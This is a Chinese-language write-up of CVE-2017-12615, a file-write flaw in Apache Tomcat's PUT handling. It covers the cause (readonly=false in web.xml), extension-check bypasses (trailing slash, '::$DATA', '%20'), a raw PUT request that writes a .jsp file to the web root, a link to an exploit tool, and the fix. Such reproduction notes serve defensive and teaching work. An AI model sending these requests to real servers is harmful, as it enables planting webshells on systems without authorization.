Tomcat PUT方法任意文件写入漏洞_CVE-2017-12615
漏洞介绍
当 Tomcat 启用了 HTTP PUT 请求方法,且设置了写权限(readonly=false),导致我们可以向服务器写入文件攻击者,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。但限制了jsp后缀,不过对于不同平台有多种绕过方法。
漏洞原理
由于Tomcat `conf/web.xml`文件中配置了可写权限(readonly=false),导致可通过PUT方法向服务器写入文件,但是由于Tomcat对文件后缀会进行检测(不能直接写入jsp)。
- 通用的绕过方法使用
/
结尾,响应码201
表示成功写入,响应码204
也表示成功写入,但存在同名文件。 - windows下可采用
::$DATA
、%20
绕过
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
漏洞复现
通过发送如下数据包即可在web根目录写入shell:
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
利用工具
https://github.com/xiaokp7/Tomcat_PUT_GUI_EXP
修复建议
将 readonly=true,默认为 true。